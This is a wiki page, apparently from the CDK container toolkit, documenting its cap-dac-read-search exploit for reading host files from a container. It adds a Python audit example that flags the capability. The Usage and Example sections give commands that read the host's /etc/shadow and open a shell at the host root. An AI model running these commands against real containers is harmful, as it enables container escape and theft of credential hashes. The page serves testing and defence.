
Exploit: cap dac read search

neargle edited this page Sep 5, 2021 · 4 revisions

Exploit: cap-dac-read-search

Thanks @nikitastupin & @verctor.

If a container is run with the CAP_DAC_READ_SEARCH capability, it is able to read arbitrary files from the host system. This is possible because CAP_DAC_READ_SEARCH gives the ability to bypass DAC (discretionary access control) checks and to open files by file handles, which are global file identifiers. The original exploit can be found at http://stealth.openwall.net/xSports/shocker.c.
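To check whether a container is exposed to this, the following added example (not part of CDK or the original page) decodes the capability masks from /proc/<pid>/status and audits `docker inspect` output for containers that were granted CAP_DAC_READ_SEARCH. The function names, container names and sample inputs are constructed for illustration.

```python
import json

CAP_DAC_READ_SEARCH = 2  # capability number in linux/capability.h

def cap_masks(status_text):
    """Parse the Cap* hex masks out of /proc/<pid>/status content."""
    masks = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key.startswith("Cap"):
            masks[key] = int(value.strip(), 16)
    return masks

def has_dac_read_search(status_text, which="CapEff"):
    """True if the chosen set (effective by default) holds the capability."""
    return bool((cap_masks(status_text).get(which, 0) >> CAP_DAC_READ_SEARCH) & 1)

def _norm(caps):
    # Docker accepts both "CAP_X" and "X"; compare on the bare upper-case name.
    return {c.upper()[4:] if c.upper().startswith("CAP_") else c.upper()
            for c in caps or []}

def risky_containers(inspect_json):
    """Names of containers whose config grants CAP_DAC_READ_SEARCH."""
    flagged = []
    for c in json.loads(inspect_json):
        host = c.get("HostConfig", {})
        added, dropped = _norm(host.get("CapAdd")), _norm(host.get("CapDrop"))
        explicit = "DAC_READ_SEARCH" in added
        via_all = "ALL" in added and "DAC_READ_SEARCH" not in dropped
        if host.get("Privileged") or explicit or via_all:
            flagged.append(c.get("Name", "?"))
    return flagged

# Constructed samples: a CapEff mask with bit 2 clear, and the same mask with bit 2 set.
STATUS_DEFAULT = "Name:\tbash\nCapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"
STATUS_ADDED = "Name:\tbash\nCapEff:\t00000000a80425ff\nCapBnd:\t00000000a80425ff\n"
INSPECT = json.dumps([
    {"Name": "/plain", "HostConfig": {"CapAdd": None, "CapDrop": None, "Privileged": False}},
    {"Name": "/shocker-lab", "HostConfig": {"CapAdd": ["CAP_DAC_READ_SEARCH"], "Privileged": False}},
    {"Name": "/all-minus", "HostConfig": {"CapAdd": ["ALL"], "CapDrop": ["DAC_READ_SEARCH"]}},
    {"Name": "/priv", "HostConfig": {"Privileged": True}},
])

if __name__ == "__main__":
    print(has_dac_read_search(STATUS_DEFAULT), has_dac_read_search(STATUS_ADDED))
    print(risky_containers(INSPECT))
```

On a live host, feed `has_dac_read_search` the contents of /proc/<pid>/status for the container's init process and `risky_containers` the output of `docker inspect` for the running containers.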

Usage

# read file from host
./cdk run cap-dac-read-search <target>

# specify bind mount point file path and read file
./cdk run cap-dac-read-search /etc/hosts /tmp/pwn

# when the target file is /, this exploit will chdir to the host root and execute a command (default: /bin/bash)
./cdk run cap-dac-read-search /etc/hosts /

# you can also specify the command to execute, but cdk treats any string starting with '-' as its own option, so only some simple commands can be used
./cdk run cap-dac-read-search /etc/hosts / cat /tmp/pwn

Example

  1. Build cdk
  2. Run a docker container:
     docker run -it --rm --cap-add CAP_DAC_READ_SEARCH -v "$(pwd)/cdk":/cdk ubuntu /bin/bash
  3. Run the cdk exploit inside the container:
     cdk run cap-dac-read-search /etc/shadow /etc/hosts

You should get /etc/shadow from host:

host-shadow

Verify that /etc/shadow from container is different:

container-shadow

ref: https://github.com/cdk-team/CDK/pull/27
